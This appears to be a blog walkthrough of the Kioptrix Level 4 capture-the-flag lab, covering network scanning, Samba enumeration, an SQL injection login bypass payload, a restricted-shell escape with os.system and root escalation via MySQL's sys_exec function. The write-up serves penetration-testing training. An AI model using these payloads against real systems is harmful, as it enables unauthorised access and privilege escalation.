Hello, in this article I will show you step by step how to solve Kioptrix Level4. The purpose of this CTF will be to become root. Click to get more information about CTF.
LEVEL : Medium
Steps
- Learning the target’s IP address with Netdiscover tool
- Detection of open ports with Nmap tool
- Collecting information via port 80 with Dirb tool
- Collecting information over port 445 with Enum4linux tool
- Detecting SQL Login Bypass vulnerability on the login page
- Running system commands over MySQL
Based on the IP information of the Kali machine, the IP address used by the target machine was determined with the following command.
netdiscover -r 192.168.88.0/24
The detection of open ports on the target machine was done as follows.
nmap -A -Pn -n -sV -sC --reason -p- 192.168.88.223
Fuzzing was performed via Dirb tool on open port 80.
dirb http://192.168.88.223/
After fuzzing on port 80, a similar process was performed on the Samba service serving 445. For this, a tool called enum4linux was used as follows.
After the tool was run, the user information that would be valid on the application was obtained. This information was stored in a file in the second image for later use.
enum4linux 192.168.88.223
In this step, the PATHs obtained via port 80 were individually compromised. In these checks, a login panel page like the one below was encountered.
Using the username obtained from the enumeration performed on Samba, a SQL Injection payload was written that would give the expression “root’ or ‘1’=’1” true in the password section. When the result obtained is examined, SQL Injection Bypass has been performed on the Login screen.
A similar login process was performed for the user named “robert”. When the screen encountered after login was checked, it was determined that another information was shown as the password of the relevant users. This information was noted for later use.
The work on port 80 was briefly interrupted and the password information obtained was used to test on SSH. In these tests, the user “robert” was successfully logged in.
After logging in, basic commands were run and it was determined that a program was running on the “robert” user that would block basic bash commands. After a few attempts, the restricted shell was bypassed with the following command.
echo os.system("/bin/bash");
After this step, checks for Privilege Escalation on the target were started. After checking a few sections, the source codes of the web application running on the target were checked. Here, the MySQL credentials information used by the relevant application was obtained.
It has been observed that the MySQL service running on the target can be connected to the root user without using any password.
Some checks have been made to run OS Command using methods such as UDF (User Defined Function) on MySQL. In these checks, it has been observed that a command with root permissions can be run on the OS using the MySQL Function named “sys_exec” defined in MySQL.
To make a little difference at this stage, the “john” user has been given “sudo” rights to use the existing password information.
sys_exec("usermod -a -G admin john");After this stage, a connection was established with the user john via SSH and root rights were obtained. Then, the CTF was completed by reading the flag in the “/root” directory.
Summary
- After finding the SQL Injection Login Bypass vulnerability on the CTF, connecting to the target machine, then bypassing the restricted shell, connecting to MySQL via source codes and then creating the scenario to become root was a scenario that resembled real life in my opinion. I can say that it is a CTF in OSCP format.
Click here to see my other articles about OSCP Walkthrough. Link
